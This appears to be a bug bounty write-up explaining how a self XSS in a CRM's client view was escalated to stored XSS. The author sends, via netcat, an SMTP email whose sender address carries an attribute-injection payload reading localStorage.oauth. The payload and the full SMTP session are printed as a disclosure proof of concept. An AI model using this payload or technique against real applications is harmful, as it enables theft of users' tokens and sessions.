What do Netcat, SMTP and self XSS have in common? Stored XSS

Plenum
Plenum
Jul 16, 2019 · 2 min read

If you are reading this you are probably wondering what is this? is this some kind of a joke? The answer is No, and it is not a clickbait, this is the story of chaining small issues and pivoting from a self XSS to a fully blown Stored XSS.

Image for post
Image for post
JUST A RANDOM PHOTO

The journey began when i started hacking on a private program, and while doing my research i came across a self XSS issue which hey were aware of and it was explicitly out of scope. So i kept digging and started to learn how the app worked, it had CRM and other related stuff which is not really important for now. The app had multiple parts and one of them was client management with regular functionalities like create/delete/modify clients, create/attach invoices… the self xss existed in the information fields of the client’s view.

<a tlclick=”sendEmail(&quot;email_here&quot;)”>email_here</a>

By adding a simple ‘ to the email i was able to break the html and then add my own attributes.

After some more digging i found out that if you send an email to the invoice email address the app would check if the email address of the sender existed in the client’s database and if found it would create a new ticket for that client but what if we send an email from a non client address? A new client is created along side with the new ticket.

Now since i can control parts of client information (email address), i need to be able to send really miss formed emails and the easiest way to do that is to use NETCAT. So i just opened a new terminal queried for their email server and started building the exploit.

First i had to build a working XSS then i had to figure out which characters break the SMTP syntax and encode them, ended up with a an email like this

‘onmouseover=’alert&#40localStorage.oauth&#41'@plenumsec.com

The final attack looked something like this

nc -C mxa.mailgun.org 25 
>HELO plenumsec.com
>MAIL FROM: <'onmouseover='alert&#40localStorage.oauth&#41'@plenumsec.com>
>RCPT TO: <random@target.com>
>DATA
From: Attacker <'onmouseover='alert&#40localStorage.oauth&#41'@plenumsec.com>
To: Victim <random@target.com>
Subject: Urgent
Date: Wed, 26 Sep 2018 14:21:26 -0400
Hello,
This is a stored xss poc.
Goodbye.

Now an attacker would just wait for the employee to visit the client management page or perform any action that includes the attacker’s email. The company email was completely guessable and thus could be targeted by just bruteforcing and automating the process.

One would argue that this attack could have been avoided by implementing SPF but sometimes security is not convenient for businesses so they have to make compromises.

Thanks for reading,

Regards, Plenum

InfoSec Write-ups

A collection of write-ups from the best hackers in the…

Sign up for Infosec Writeups

By InfoSec Write-ups

Newsletter from Infosec Writeups Take a look

By signing up, you will create a Medium account if you don’t already have one. Review our Privacy Policy for more information about our privacy practices.

Check your inbox
Medium sent you an email at to complete your subscription.

Plenum

Written by

Plenum

InfoSec Write-ups

A collection of write-ups from the best hackers in the world on topics ranging from bug bounties and CTFs to vulnhub machines, hardware challenges and real life encounters. In a nutshell, we are the largest InfoSec publication on Medium. Maintained by Hackrew

Plenum

Written by

Plenum

InfoSec Write-ups

A collection of write-ups from the best hackers in the world on topics ranging from bug bounties and CTFs to vulnhub machines, hardware challenges and real life encounters. In a nutshell, we are the largest InfoSec publication on Medium. Maintained by Hackrew

Medium is an open platform where 170 million readers come to find insightful and dynamic thinking. Here, expert and undiscovered voices alike dive into the heart of any topic and bring new ideas to the surface. Learn more

Follow the writers, publications, and topics that matter to you, and you’ll see them on your homepage and in your inbox. Explore

If you have a story to tell, knowledge to share, or a perspective to offer — welcome home. It’s easy and free to post your thinking on any topic. Write on Medium

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store